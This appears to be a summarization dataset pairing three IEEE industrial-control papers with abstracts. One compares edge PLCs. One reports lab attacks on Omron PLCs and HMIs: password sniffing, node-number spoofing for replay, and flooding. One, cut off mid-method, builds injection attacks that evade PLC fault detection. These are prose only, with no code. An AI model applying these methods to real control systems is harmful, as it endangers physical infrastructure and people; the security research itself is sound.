SCOPEENTERPRISE ECOSYSTEM SCOPE Real worldEdge nodes Things, People and EnviromentsConnected devices and Smart objectsEdge gateways Edge processingCloud servers Applications F igure 5: Reference architecture with three main tiers [24] with the rising population of Edge computing. Edge computing consortium, [21] has as assessed that Edge computing services deliver important CROSS values to industry digitalization (Fig 4): Connectivity of heterogeneous networks, which are populated with a mass quantity of devices, is the main pillar of Edge computing. The rising quantity of devices, as well as the interoperability of long existing industrial networks, label connectivity as one of the challenges of Edge computing. Industrial systems are latency-sensitive and require real-time analysis. Therefore, reducing latency and providing real-time services are some of the main contributions of Edge computing and one of the key research points, as elaborated in [22]. As a bridge between the physical and cyber world, edge serves as the first entry of a large amount of heterogeneous data which leads to the high importance of data optimization. Edge intelligence is making smart applications more efficient and provides major cost advantages. Security on the edge of a network includes device security, network security, and data and application security, where end-to-end protection is critical. With Edge computing entering the industry, there is an arising need to develop the reference architecture to accommodate edge principles in already existing industrial architecture. One of the reference architectures (RA) has been developed as a result of the H2020 FAR-EDGE [23] project by using the concepts of tiers and scopes to describe the structure of a system. Scopes define the mapping of system elements to a factory Plant scope or wider corporate IT enterprise ecosystem scope. Plant scope covers levels 0 to level 4, while ERP is part of the Enterprise ecosystem scope. Tiers can be tied to scopes but are technical-oriented classifications that divide a system into three main tiers as shown in Fig 5 with one support tier which provides services to other tiers. Bottom layer is the field tier layer, which consists of edge nodes and entities of the real world. Edge nodes, according to FAR-EDGE, are any devices that represent the bridge between the digital world on one side and the physical world on the other, with embedded intelligence (smart objects) or without it (connected devices). Second, and the core of RA, is the edge tier populated by edge gateways, computing devices more intelligent than edge nodes that host software executing edge processes, i.e. real-time analysis. The top layer of discussed RA is the cloud tier where cloud servers are deployed. The cloud servers host the business logic and have the widest scope of all the tiers. A cloud tier can be located on commercial clouds or on private clouds i.e., corporate data centers, to minimize privacy risks. Besides FAR-EDGE RA, Edge Computing Consortium and Industrial Internet Consortium proposed the RA which are described in [21]. IV. EDGE PLC S: STATE -OF-THE-ART In FAR-EDGE reference architecture, PLCs are positioned in field tier and labeled as edge nodes: smart objects. In the following section state-of-the-art PLCs will be presented, some of which are the outgrown position of edge nodes and can be labeled as edge gateways. A. ControlEdge PLC According to the Honeywell Process Systems manufacturer, ControlEdge PLC [25], is an advanced loop and logic controller characterized by modular design. Designed to comply with control and data management needs, this PLC is focused on connectivity. CPU modules, based on the e300 32- bit RISC PowerPC Architecture, handle the fast digital scanning and analog scanning through a dual scan method that supports a wide range of function block algorithms. Open Ethernet communication provides peer-to-peer communications between controllers as well as access by HMI or SCADA software applications. ControlEdge series offers redundant PLC with which the CPUs communicate, with up to 12 I/O modules over Ethernet or fiber optics. The operator interface provided by Honeywell, as well as third-party interfaces can be used for user interface support. B. GRV-EPIC-PR1 and GRV-EPIC-PR2 GRV-EPIC-PR1 and GRV-EPIC-PR2 are modular Edge computing PLCs that form the Groov EPIC (Edge Programmable Industrial Controller) [26] system. According to the manufacturer, it offers reliable real-time control that can be designed by using flowchart programming through PAC Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:08 UTC from IEEE Xplore. Restrictions apply. (by combining the PLC characteristics of a real-time machine with the strengths of personal-computer based systems creating Programmable Automation Controllers - PACs.) control, IEC 61131-3 compliant programs and, also, by using programming languages Python, C/C++ with access to the Linux OS. The collection, processing, exchange, and display of data at the very edge of the network are enabled via tools like Ignition Edge, Node-RED and MQTT. The integral touchscreen is used for on-premises data visualization, which can be done on an external HDMI monitor or web and mobile applications. C. MELIPC MI5000 Mitsubishi Electric Corporation brought out an Edge computing solution to industrial automation processes, composed of industrial computer MELIPC and software solutions. Leading hardware solution is incorporated in an industrial computer, the MELIPC MI5000 [27], create signed to implement real-time demands of industrial applications alongside an Edge computing application. The MI5000 is able to perform device control and data collection due to the VxWorks operating system, which stands as pre-installed software. Besides the VxWorks operating system, MI5000 can run Windows at the same time, which enables analysis display of acquired data and powerful processing at the edge. Industrial computer is equipped with CC-Link IE Field Network port and CC-Link IE Field Network Basic port, making compatible products easy to connect. Installing of additional software allows easy collection of data from third- party companies. Table 1 presents the parallel comparison of mentioned PLCs based on main characteristics. TABLE I. COMPARISON OF EDGE PLCS ControlEdge HC900 Controller groov EPIC GRV-IAC-24 MELIPC MI 5000 Power supply 90 264 V AC 47 63 Hz 110 240 V AC 50 60 Hz 100 240 V AC 47 63 Hz Operating ambient temp. 0 60 C -20 70 C 0 55 C Vibration resistance 0 Hz to 14 Hz amplitude 2.5 mm (peak-to- peak), 14 Hz to 250 Hz acc. 1 g N/D Compliant with JIS B 3502 and IEC 61131-2 Mounting DIN rail DIN rail DIN rail Pollution degree = 2 N/D <= 2 Ability to add I/O modules YES YES YES CPU N/D Quad-core ARM Intel Core i7- 5700EQ 2.6 GHz Operating system N/D Linux Windows 10 IoT Enterprise 2016 (64bit) VxWorks 7.0 Memory capacity 64 MB or 128 MB (depending on CPU model) 2 GB RAM 2MB battery- backed RAM + 6 GB user space 12 GB1 + 45 GB2 (45 GB1) 1 GB1 + 4 GB2 Programming language IEC-61131-3 standard languages Flowchart with PAC Control or IEC-61131-3 standard languages Python, C/C++ Language supporting Windows OS + C/C++ 1. Windows 10 IoT Enterprise 2016 (64bit) 2. VxWorks 7.0 As one of the main values of Edge computing, previously mentioned, connectivity will be discussed, separately, and displayed in Table 2. TABLE II. CONNECTIVITY CAPABILITIES OF EDGE PLC S ControlEdge HC900 Controller groov EPIC GRV-IAC-24 MELIPC MI 5000 RS-232 0 4 selectable ports 1 RS-485 2 - USB ports 0 2 (2.0) 2 (3.0) + 2 (2.0) Additional ports HDMI Display port CC-Link IE Field Network1 Ethernet Network Connection 10Base- T/100BASE- TX/1000BASE- T 10Base- T/100BASE- TX/1000BASE- T 10Base- T/100BASE- TX/1000BASE-T RJ-45 connectors 1 or 2 (dependent on CPU model) 2 1 + 1 1. High-speed data collection from compatible devices Taking the FAR edge architecture as a reference, and the characteristics of these three PLCs, it is possible to attach one of the tiers and classify them accordingly. ControlEdge represents modest edge PLC capabilities, the main strength of which is the connectivity and its functionalities match edge nodes' functionalities. Groov EPIC controller act as a modular PLC equipped with a built-in display, which offers real-time applications but also acts as an edge gateway, locating it in the edge tier. The MELIPC MI5000 is an industrial computer performing Edge computing applications in real-time which can be, easily, connected to a PLC to perform control applications. This industrial computer acts as an edge gateway, located in the edge tier. These PLCs enable implementation applications based on architectures and services for vast data analytics like: Software as a service (SaaS), Platform as a service (PaaS), Infrastructure as a service (IaaS), Predictive maintenance, Protocols for IoT/IIoT data collection. All advantages of these PLCs can be utilized only if you have engineers with appropriate knowledge [28],[29]. New edge PLCs are ready to bring additional value for customers over standard PLCs which are used only for control tasks. V. CONCLUSION The vast data quantity, generated from heterogeneous devices in the industrial environment, that requires real-time decision making represents a motivation for implementing a new paradigm, Edge computing, to industrial automation. This paradigm is being applied to PLCs and industrial computers, devices at the very edge of the network, from which three are presented in this paper. Edge PLCs, which are equipped with powerful capabilities, are bringing new computing power to the shop floor while maintaining real-time analysis. The devices act as a bridge between physical on-premise tier, populated with sensors and actuators, and higher tiers which Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:08 UTC from IEEE Xplore. Restrictions apply. consists of supervisory and business-oriented applications. With new computing capabilities, functionalities that are being performed on edge PLCs are improved. Applications from higher levels of industrial networks can be delegated to PLC making the industrial network more reliable in case of communication failure.
Summary:
Ongoing industrial revolution Industry 4.0, driven by a mesh of disruptive new technologies, promises a more effective and productive industrial environment. The challenges that have arisen as a side effect, such as the vast quality of data that needs to be transmitted and processed safely in real-time, require a new computing approach. One of the paradigms being used to conquer this problem is Edge computing which, due to an increase in the performance and enhancement of storage capacities, moves data processing closer to the data origin. This new approach is being applied to Programmable Logic Controllers (PLCs), the core of industrial automation since the 1960s. This paper offers a parallel comparison of state-of-the-art PLCs that are adopting Edge computing principles and their fit in an already complex industrial network.
|
Summarize:
Keywords - SCADA; industrial security; test-beds I. INTRODUCTION Supervisory Control a nd Data Acquisition (SCADA ) systems consist of Programmable Logic C ontroller s (PLCs ), Human -Machine I nterface s (HMI s), and Remote Terminal Units (RTUs ) amon g many other components [2]. In old er systems, these components communicated using their own dedicated networks and used their own specially -developed protocols. Therefore, SCADA systems were assumed secure by isolation. Ho wever, the fast growth of SCADA systems [1], the use of off -the-shelf components, and the development of mixed protocols (e. g. Modbus/TCP , Omron, ISO-TSAP ) forced SCADA systems to become more open and accessible online , and hence exposed to various cyber - attacks [ 3]. Many attacks on SCADA systems have been reported so far such as the Maroochy water breach incident [ 4] where by an attacker gain ed control over 150 sewage pumping stations for more than three months, the Ohio nuclear power plant incident [5] where by the safety monitoring system was shut down by the Slammer worm, and more recently the Stuxnet worm [ 6] that is considered to be one of the most sophisticated computer worms of all times affect ing more than 100,000 hosts and severely hindering the Iranian nuclear program. Several organizations are collecting and archiving SCADA incident reports. In [2], the authors introduced the Industrial Security Incident Database that provides a comprehensive search engine for SCADA incidents. In this datab ase, SCADA incidents were categorized according to their severity, consequences, entry point , etc. Furthermore, two major observations were highlighted : 1) a ttacks are getting more frequent and 2) attacks are becom ing more external than internal oriented. All of the aforementioned incidents indicate how vulnerable SCADA systems are, and they emphasize the devastating consequences of such attacks on the environment and the safety of human s. Therefore, a deep analysis o f SCADA protocols and components must be performed in order to understand and address these vulnerabilities and hence prevent them from being further exploited by attacker s. In this paper , we present a test-bed for SCADA systems using components from a major vendor (Omron) and we show how we tested the Factory Intelligent Network Services (FINS) Protocol and detect ed how to bypass its security features . In addition, we assessed the immun ity of the SCADA components against DoS and fragmentation attacks. The rest of this paper is organized as follows: section II reviews the related work and lists state -of-the-art SCADA test-beds. Section III describes our test-bed, and lists the components we tested. In section IV, we list the a ttacks and how we conducted them . In section V, we present our results and list the detected vulnerabilities and analyze their consequences. Finally, section VI concludes the paper and presents some solutions and future work. II. RELATED WORK In th is section, we list the state-of-the-art SCADA test- beds and the associated findings. In [7], the authors tested SCADA systems for resilience to different attacks using a simple test-bed that consists of a vulnerability tester , a configurat or, a traffic analyzer , and a target device. Many attacks were conducted including Netwox attacks, Nessus attacks, fragmentation attacks and HTTP attacks. The results showed a high level of success for the attacks. As a result , the authors recommended the use of a Defense -In-Depth approach. In [8], the authors proposed a simulation test-bed that can be used in order to uncover SCADA vulnerabilities. The authors divided the SCADA system into three layers: The Field Bus layer: it consists of the RTUs , sensors , and actuators . This layer is respon sible for collecting r aw data and delivering them to the higher layers. The Industrial Ethernet layer: it consists of Master Terminal Unit s (MTUs ), PLCs, HMIs , and servers . It is responsible for controlling the first layer and analyzing the data. The Busin ess Management layer: it consists of enterprise services and business application s. This layer allow s users 978-1-4673-5307-6/13/$31.00 2013 IEEE978-1-4673-5307-6/13/$31.00 2013 IEEEThe 3rd International Conference on Communications and Information Technology (ICCIT-2013): Digital Information Management & Security, BeirutThe 3rd International Conference on Communications and Information Technology (ICCIT-2013): Digital Information Management & Security, Beirut 22Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:39 UTC from IEEE Xplore. Restrictions apply. to control the SCADA system through external networks. Furthermore, the authors performed several attacks based on an attack tree methodology and analyzed their severity on the SCADA networks. The authors of [9] proposed three test-beds to investigate SCADA systems. The first test-bed is the Single Simulation - Based instantiation where the authors proposed the use of a single simulation environment using the Simulink/Stateflow from Mathworks to simulate the SCADA system. In the second approach the authors proposed the federated simulation -based instantiation where th ey used multiple simulation environments using Omnet++ to simulate the network components and DEVS to simulate the software modules. Finally , the last test-bed is the emulation - and implementation -based instantiation where the authors used real of f-the-shelf SCADA components. Furthermore, the authors performed multiple attacks in order to study their impact on SCADA systems including DoS attacks, integrity attacks , and phishing attacks. In [10], the authors developed a test-bed and an Intrusion Detection System (IDS) that monitor s two levels of attacks. In the first level, the IDS detects TELNET intrusions from outside the local network and observes normal and abnormal behaviors concerning login attempts and command/response communications. Furth ermore, it automatically creates Snort rules if possible in order to detect further intrusions. In the second level, the IDS detect s abnormal behavior inside the local network by constantly monitoring the state of all the network components and the changes that occur. The authors proposed an efficient technique to detect unauthorized login attempts via TELNET , and abnormal internal behavior. Vulnerabilities in industrial protocols were studied in [ 11] where the authors worked on detecting vulnerabilities in the command syntax . The authors used t he BlackPeer software to study the effect of various syntax grammar errors in different functions of the industrial protocols. The study revealed a very high level of vulnerabilities and called for urgent solution s. In [12], the author exposed many vulnerabilities in the Profinet and the ISO -TSAP protocols used by Siemens PLCs. The vulnerabilities discovered were shocking starting with the fact that the ISO -TSAP protocol doesn t use encryption, thus, reading password h ashes and useful information from the TCP dump was relatively easy. Accordingly, the author was able to perform replay and man- in-the-middle ( MITM ) attacks using such information. Consequently, the author was able to reprogram the PLC, start/stop the CPU, bypass the authentication process, change the authentication password or remove it altogether, read/write the memory, and even get a shell command to run on the PLC by fuzzing the PLC. Although Siemens reported that it has fixed most of the problems , the f uzzing attack is yet to be fixed . However, many other manufacturers that use the same protocols are yet to fix many of these problems. In [13], the authors described two successfully perf ormed attacks on a SCADA network. In the first attack, the authors fuzzed the SCADA HMI (Cimplicity HMI V6.1) and crashed it after sending 2216 bytes that resulted with a heap buffer overflow. This attack has a great impact on the SCADA system since the process has to be manually restarted in order to bring the system back to its normal behavior. Furthermore, th e buffer overflow allowed the author s to execute desired payloads on the HMI server such as running a remote shell. In the second attack, the authors sniffed the data around the Historian, which allowed them to extrac t login usernames and passwords. Even though the passwords were encrypted, their encryption was weak (a Base64 encoding). Extracting the usernames and passwords allowed the author s to take the attack s to the next level where they created a b ackdoor on the Historian using special ly crafted packet s. Although many papers worked on detecting vulnerabilities in SCADA systems, no previous work had implemented a reproducible comprehensive study exposing vulnerabilities in SCADA protocols and components against int ernal attacks . This will be the main goal of this paper. III. TEST-BED AND COMPONENTS Our test-bed is built using a specific vendor , but can be easily extended to equipment from other vendors. Our test- bed consist s of an Omron PLC CJ1M -CPU11 -ETN , an Omron HMI NS5-SQ11 -v2, a controller PC and an attacker PC. As illustrated in Figure 1, all the test-bed components are conn ected via Ethernet using a hub. In addition, the PLC and HMI are also connected through an NT Link, which is a serial communication protocol d eveloped by Omron. Figure 1. Test-bed and its components The Omron PLC and HMI are the devices under test (DUT). The controller is a computer monitoring the performance of the D UT and has all the needed software to program and run the PLC and HMI. In order to describe the attacks performed on the Omron components , we need first to understand the security features of the FINS protocol. This protocol has two security features The 3rd International Conference on Communications and Information Technology (ICCIT-2013): Digital Information Management & Security, BeirutThe 3rd International Conference on Communications and Information Technology (ICCIT-2013): Digital Information Management & Security, Beirut 23Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:39 UTC from IEEE Xplore. Restrictions apply. associated with the PLC : read protection and write protection . Read protection prevents the access to some tasks and features on the PLC unless a password was acquired , while the write protection helps in protecting the PLC from executing unauthorized write commands by applying a filter on the received commands and executing only tho se arriving from specific nodes (e. g. node #4 on network #7 ). Figure 2 shows the security features of the FINS protocol regarding the PLC security . Figure 2. PLC security features of the FINS protocol Moreover, the HMI is equipped with two security features. First, there is the Screen Data Security F unction where by the Omron software responsible for downloading/uploading screen features to the HMI requests a certain password in order to perform these functions . Second, there is the User Security Func tion where by a five-level password security module is used in order to perform use r authentication and hide/show critical features on the HMI screen according to the operator s access level. Figure 3 demonstrates the security features of the HMI. Figure 3. HMI security features IV. ATTACKS We will divide the attacks into two main parts : attacks on the PLC and attacks on the HMI. In turn , each part will be divided into four sections : Cryptographic attacks, replay attacks, fragmentation attacks, and Denial of Service (DoS) attacks. 4.1 Attacks on the PLC In the following sections , we will show how we can bypass the password -based read protection and the filtering - based write protection . 4.1.1 Cryptographic attacks: One of the weakest aspects of the FINS protocol is that it does not use any encryption in data exchange. Therefore , using Wireshark [14], we we re able to extract the password of the read protection while it was being sent to the PLC. Figure 4 highlights the captured read protection password , 43214321 , while being transferred to the PLC. Figure 4. The captured read protection password Moreover, since no encryption is used, we were able to capture even more valuable information such as the FTP access password that allows accessing the memory card on the PLC, the HTTP access password which provides almost full control over the PLC through a web server , and the node numbers of the legitimate n odes that are allowed to access and control the PLC (the importance of these node number s will be highlighted in the following section). As a result, the absence of an encryption technique in the FINS protocol and the use of a simple eavesdropper like Wire shark offered vital information that can be exploited in sabotaging the PLC. 4.1.2 Replay attacks: The other security feature of the FINS protocol is the write protection. As mentioned earlier, the write protection helps in filtering out the write requests coming from unauthorized nodes. This works by selecting and inserting exceptions into the PLC representing the node numbers of the other PLCs (or SCADA components) that the PLC can communicate with. Nevertheless , by eavesdropping on the SCADA traffic we were able to detect the node numbers that each PLC is communicating with. This was done by simply checking which node numbers each PLC was replying to. Another method for detecting these node numbers is to simply try every possible node number. The FINS protocol allows the assign ment of one of 255 node numbers for each PLC on 127 network numbers. Therefore, overall , we get 255 127=32385 possibilities . We can easily send write request s using all possible node number s and then detect which requests the PLC would reply to. Finally , after detecting the legitimate node numbers that a PLC can communicate with , we were capable of bypassing the write protection and executing any write request on the PLC by setting the sourc e network and node number s to one of these legitimate values . As a result , we were able to send orders to open/close the PLC s output modules, turn the PLC on and off, change its IP address , change the exceptions for the legitimate node numbers or remove them altogether , and entirely reprogram the PLC. Figure 5 illustrates the different fields in the FINS protocol that can be manipulated in order to inject specific commands . The DNA/DA1/DA2 and SNA/SA1/SA2 fields represent the destination and source network, node and unit numbers respectively and the Command code field is used to identify the command to be executed. Figure 5. FINS protocol command data structure [15]. The 3rd International Conference on Communications and Information Technology (ICCIT-2013): Digital Information Management & Security, BeirutThe 3rd International Conference on Communications and Information Technology (ICCIT-2013): Digital Information Management & Security, Beirut 24Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:39 UTC from IEEE Xplore. Restrictions apply. 4.1.3 Fragmentation attacks: Fragmentation attacks are performed by sending specia lly crafted packets that can cause the PLC to crash or at least to stop responding. We have performed five fragmentation attacks . 1- Ping of Death attack : this attack was performed by sending IP packet s with size larger than the maximum allowed IPv4 packet size. 2- TearDrop attack : This attack was performed by sending IP fragments such that one fragment fits entirely inside another one. 3- Zero -Length fragmentation attack : This attack was performed by sending IP packets with length equal to zero. 4- Nestea attack : This is the Linux equivalent attack to the TearDrop attack . 5- Oshare attack : This attack was performed by sending multiple malformed IP packets. Apparently, the PLC is immune to these attacks, where all the packet s were discarded by the PLC and did not affect its performance. 4.1.4 DoS attacks: Similarly to the fragmentation attacks, DoS attacks aim at crashing the PLC by sending a very large number of packets within a very small time frame . We have successfully performed DoS attacks using four methods: a- UDP reflect attack Another weakness in the PLC protocol is allowing the PLC to respond to every single read request arrivi ng from any IP/MAC -address/node -number , where no filter is used. Therefore, by simultaneously sending a very large number of read requests (i.e. memory area read, controller cycle read, and controller status read requests) the PLC stopped responding as long as the flooding was active. In order to perform this attack, it was enough to send one packet every 3 milliseconds (333 packets per seco nd), where each packet was only 58 bytes long. Consequently, we were using only a bandwidth of 151 kbps, and it was enough to stop the PLC from respon ding. b- Netwox Netwox [16] is a powerful toolbox that can be used in order to pe rform multiple attacks . In our test-bed we ha ve used two of the Netwox tools : Netwox tool # 76: Syn flood attack which aims at crashing the D UT by flooding it with SYN packets . Netwox tool # 74: Random IP packet flooding which aims at crashing the D UT by flooding it with random IP packets . Both attacks were successful, and as long as the flooding was active, the connection with the PLC was dead . However, both of these attacks were performed with a very large number of packets and the use of a large bandwidth, hence they can be easily detected. c- WWW infinite request attack This attack is performed by flooding the PLC s HTTP port with HTTP request s. A simple shell script was used in order to perform th e attack . As a result, the PLC was inaccessible through its HTTP port as long as the flooding was active. This attack also uses a very large number o f packets and hence it can be easily detected . d- LOIC LOIC [17] is a tool used in order to perform a DoS attack by sending UDP/TCP/ HTTP packet s at very high rates. While this attack was successful and the PLC stopped responding, detecting this attack is relatively easy because of its very high bandwidth consumption . 4.2 Attacks on the HMI In this section , we show how to bypass the Screen Data Security Function and the Use r Security Function . 4.2.1 Cryptographic attacks: The User Security Function uses a five -level password security module. Th ese passwords are used in order to define the level of authentication of the users and to grant them access according to their assigned privilege . Hence, securing these passwords is very important, especially those that grant high permission levels. However, these passwords can be easily captured by using Wireshark since they are being sent is the clear while programming the HMI . 4.2.2 Replay attacks: The Screen Data Security Function is a security function that requires the user to insert a password into the HMI programming software on the Controller PC in order to gain permission to program the HMI. This function performs the authentication through this software only (the HMI isn t involved in the authentication function) , thus we were not able to capture the password . However, because the HMI was not involved in the authentication function , we were able to perform replay attacks easily. Consequently , we were able to restart the HMI, reverse the open/close buttons, change the User Security Function passwords, and reprogram the HMI altogether. This attack can result in devastating consequences of an industrial scale. 4.2.3 Fragmentation attacks: The same five attacks that were performed on the PLC were performed on the HMI computer . While all five attacks were unsuccessful against the PLC, only four of them were unsuccessful against the HMI. The Zero -Length fragmentation attack froze the HMI as long as the flooding was active . Similar to all flooding attacks, detecting this attack is relatively easy. 4.2.4 DoS attacks: It was also relatively easy to perform DoS attacks on the HMI using four tec hniques: a- Restart functions From section 4.2.2 , we saw that we can restart the HMI using a simple replay attack. This attack is performed by sending one 80 -byte packet that forces the HMI to restart which requires 20 seconds. Therefore, by sending one packet every 20 seconds , the HMI is forced to restart continuously . Moreover, by changing the source IP and MAC address of The 3rd International Conference on Communications and Information Technology (ICCIT-2013): Digital Information Management & Security, BeirutThe 3rd International Conference on Communications and Information Technology (ICCIT-2013): Digital Information Management & Security, Beirut 25Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:39 UTC from IEEE Xplore. Restrictions apply. this packet each time , detecting this attack becomes nearly impossible. b- Netwox In this attack w e used the same two tools used in attacking the PLC. Both attacks stopped the connection with the HMI and froze the HMI touch screen. Again, we must mention that this attack can be easily detect ed. c- WWW infinite request attack This attack is performed on th e HTTP port of the HMI by flooding it with HTTP requests . As a result , the HTTP connection with the HMI was dead as long as the flooding was active . Similar to the PLC, this attack is easily detected because it uses a very large number of packets. d- LOIC As expected, LOIC attacks stopped the connection with the HMI and froze its touch screen as long as the flooding was active . However, The HMI was only vulnerable to UDP and HTTP LOIC attacks where as TCP flooding had no effect on the HMI. As mentioned earli er, LOIC uses very large transmission rate s which make it very easy to detect. V. RESULTS AND ANALYSIS Based on the above attacks , we can conclude that the Omron PLC CJ1M -CPU11 -ETN is very easy to bring down , starting with the fact that all data is sent in the clear, which means that capturing valuable information is straightforward . This results in the Omron FINS protocol making it very easy to bypass all the security measures by masquerading a legitimate node number and performing any type of replay attacks, which are hard to detect in some cases . Therefore, we were able to start/stop the PLC, change its permission , change its IP , change the passwords (even without knowing the old passwords) , change the write protection features , and even reprogram the P LC altogether . In addition, the PLC i s vulnerable to DoS attack s, and a lthough these attacks were successful, we must mention that they were only able to stop the communication with the PLC. However, the PLC did not stop running and its modules kept on run ning smoothly. Finally, this PLC is immune to fragmentation attacks. On the other hand , the Omron HMI NS5 -SQ11 -v2 has two security feature s that were very easy to bypass : the Screen Data Security Function was bypa ssed via a basic replay attack, and the User Security Function that enable s critical functions through the HMI s touch screen using a five -level password security system transmits the passwords in the clear . Therefore, it was very easy to collect these passwords. In addition, we were able to restart the HMI using specially fabricated packets , change the passwords and functions , and again reprogram the HMI. The HMI is vulnerable to DoS attacks and to some fragmentation attacks. Table 1 summarizes the attack results. The previous vulnerabilitie s in the Omron components can have devastating consequences , and t he main reason behind these vulnerabilities is the lack of encryption . Finally, re placing the hub in the tesbed with a switch or a Wi-Fi access point might increase the test-bed s security. While using a switch, cryptographic attacks would become very hard to perform without ARP cash poisoning since we would no longer be able to sniff the packets transmitted between the SCADA components and the controller , hence we would not detect the passw ords, node numbers, etc. However , replay attacks, fragmentation attacks, and DoS attacks would all still be applicable. On the other hand, when using a Wi-Fi access point, sniffing valuable inf ormation would become very easy, and all of the previous attack s would still be applicable. However, if a strong wireless security algorithm , such as WPA2, was implemented along with a hard password , the attacker would no long be able to access the test-bed, and hence the attacks would no longer be applicable. VI. CONCLUSION AND FUTURE WORK In this paper , we showed how vulnerable some SCADA systems are, either by bypassing the protocol security features or by attacking the SCADA components themselves. We have performed cryptographic attacks, DoS attacks, replay atta cks and fragmentation attacks. Our results show ed that these attacks are very easy to perfo rm and hard to detect. Therefore, finding a solution is an urgent matter to ensure the safety of SCADA networks. As for future work, we are planning on preforming th e previous tests on more SCADA components from multiple ma nufacture rs in order to obtain a more comprehensive view of SCADA security. TABLE 1: ATTACK RESULTS Attack On the PLC Severity On the HMI Severity Cryptographic Attacks Successful Very high Successful Very high Replay Attacks Successful Very high Successful Very high Fragmentation Attacks Unsuccessful Safe Successful Medium Denial of Service attacks Successful High Successful High Acknowledgment The authors would like to acknowledge the Lebanese National Council for Scientific Research for its support of this research work.
Summary:
Supervisory Control and Data Acquisition (SCADA) systems have become essential to many industries around the world. Nowadays, SCADA systems are controlling many critical infrastructures such as power grids, mega factories, water treatment systems, and even nuclear power plants. As a result, SCADA systems have become very attractive targets for malicious attacks. In this paper, we show a test-bed that we have developed to detect vulnerabilities within SCADA protocols against internal attacks in order to find out how easy it is to bypass security measures in such protocols . Furthermore, we have tested SCADA components to assess their vulnerabilities against the following attack s: Denial of Service (DoS) attacks, replay attacks, cryptographic attacks, and fragmentation attack s. Our results indicate that SCADA protocols and components are very vulnerable, and hence it is of paramount importance to find immediate solution s to these vulnerabilities .
|
Summarize:
1 Introduction Control systems as the fundamental components of cyber- physical critical infrastructures have been widely used inpower grids. On account of their crucial role in modern in-dustrial society, they are becoming highly vulnerable targetsfor adversaries causing malicious damage. Traditional safetyprotection is mostly through cyber security solutions and ef- cient to prevent the virus invasion into the industrial net-work. However, recent research has demonstrated that nocontroller code with existential threat is allowed to be exe-cuted after it passed physical safety checks with the TrustedSafety V eri er (TSV) [1]. Moreover, intruding the host sys-tem like Stuxnet malware [2, 3] is very challenging job inview of well-protected control networks. Therefore, moreand more interests have been paid to traditional false data in-jection (FDI) attacks, which do not require to break throughhardened industrial control network to upload the maliciouspayload in the power control system. In recent years, more and more security researches have been focused on FDI attack in power grids. From the viewof system s topology, Liu et al. [4] announced that false datainjection attacks could introduce arbitrary errors into certainstate variables which mislead the state estimation processwithout being detected by bad measurement detection. Yanget al. [5] implemented FDI attack on various IEEE standardbus systems, and proved its advantage over a baseline strat-egy of random selections. However, the above FDI attacksis feasible with the assumption that whole system s con g-uration or topology is available and a great number of com-promised sensors of large power system is accessible, whichare hard to implement during the actual operation. From theview of cyber-physical platforms, Mclaughlin et al. [6] pro-posed FDI attack against PLC through the controller s be-havioral model to search the optimal input vector to destroythe control system. Pang et al. [7] presented stealthy falsedata attacks, which can thoroughly destroy the normal op- *This work is supported by National Natural Science Foundation of China (Grant Nos. 61172064, 61473184).eration of the output track control systems. Both of them ignore mature solution of fault detection [8 10], which are applied to the intelligent controller such as PLC. In this paper, we present false sequence attack against PLCs, which can disable the fault detection in PLCs. Onlyfew compromised sensors and suf cient signal sequence(I/O vectors) monitored between PLC and actual plant are re-quired to be controlled during the construction of the attack.Moreover, we analyze and model the collected fault-free I/Otraces of compromised PLCs to nd false sequences, whichcan be injected into inputs of remote sensors to damage thecontrol system and cannot be detected by fault detection. Itis noteworthy that under the condition of existing fault detec-tion, we take advantage of fault-tolerance rate kto construct false sequences based on identi ed model. We organize the rest of this paper as follows: in Section 2, we give the formulation of our false sequence attack. In sec-tion 3, we present the modeling of PLC-based control sys-tem and construction of false sequence attack. In section 4,we provide a representative industrial simulation and obtainsome simulation results. In Section 5, we will draw someconclusions. 2 Problem Formulation Considering the threat model described in Fig. 1, attack- ers only need to access and confuse the remote less-protectedsensors of control system that are distributed geographicallyacross the country. Then, the attack can indirectly per-form malicious damage to human-machine interface (HMI)whose inputs come from remote sensors of remote termi-nal units (RTUs) or PLCs through the heterogeneous com-munication networks. To prevent the anomalies caused byphysical faults, every smart controller deploys the fault de-tection mechanism. To make sure the feasibility of our at-tack, we assume that the attackers get hold of the high-levelinfrastructural con guration, such as connecting relation-ship between the sensors/actuators and RTUs or PLCs in-puts/outputs, which is not hard to access in practice. With theabove knowledge the attackers construct the false sequenceattack to inject into compromised sensors which send mis-guided measurements to the PLC.Proceedings of the 35th Chinese Control ConferenceJul y 27-29, 2016, Chen gdu, China 10090Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:50 UTC from IEEE Xplore. Restrictions apply. Figure 1: The threat model for false sequence attack However, the challenge is how to construct the attack that makes PLCs perform malicious actions with the mature faultdetection deployed in the control system. One of the maintask for false sequence attack is to analyze and disable thefault detection. False sequences attack is essentially to ex-ploit the vulnerability of fault detection principle that wasmerely designed to solve the random fault problem, andsend undetectable and corrupted measurements to the PLCthrough compromised remote sensors. Fig. 2 shows how theattack is constructed. We assume the adversaries have accessto signal or stack traces exchanged between PLC controllerand plant. With the inputs and outputs vector databases, weidentify the discrete event model that is fault-free similarly to modeling approach of fault detection. Finally, we searched for all the sets of undetectable false sequences that cause themalicious system behavior from identi ed model. The spe-ci c search algorithm is discussed in next section. Note thatobtaining appropriate length of false sequences is crucial inwhole traversal process. Figure 2: Construction of the false sequence attack 3 Modeling and construction of false sequence at- tack We require a formal description to identify m-behaviors for BEHm Ident and to observe m-behaviors for BEHm Obs, which is brought in to quantify the exceeding m-behaviors generated by the identi ed model. The identi cation goalis to minimize the amount of exceeding m-behaviors for a given value of identi cation parameter m. Rather, It is ob- vious that BEH m Ident is equal to BEHm Obs. Then we perform the false sequences on the basic of identi ed model. 3.1 Data collection and formal de nition of observed behavior We can collect sampled data between PLC and controller through capturing the signals after they have been gatheredby the PLC controller [8]. Fig. 3 shows the widely adapted method to capture I/O vector sequences from PLC that canbe used to monitor the compromised data by attacker. Wecollect the data to form the identi cation database at eachend of I/O vector calculus through the OPC communicationmode. Figure 3: PLC cycle and data collection After implementing the collection of data, we need to de- ne the observed input/output (I/O) sequence, language andbehaviors of the collected data. 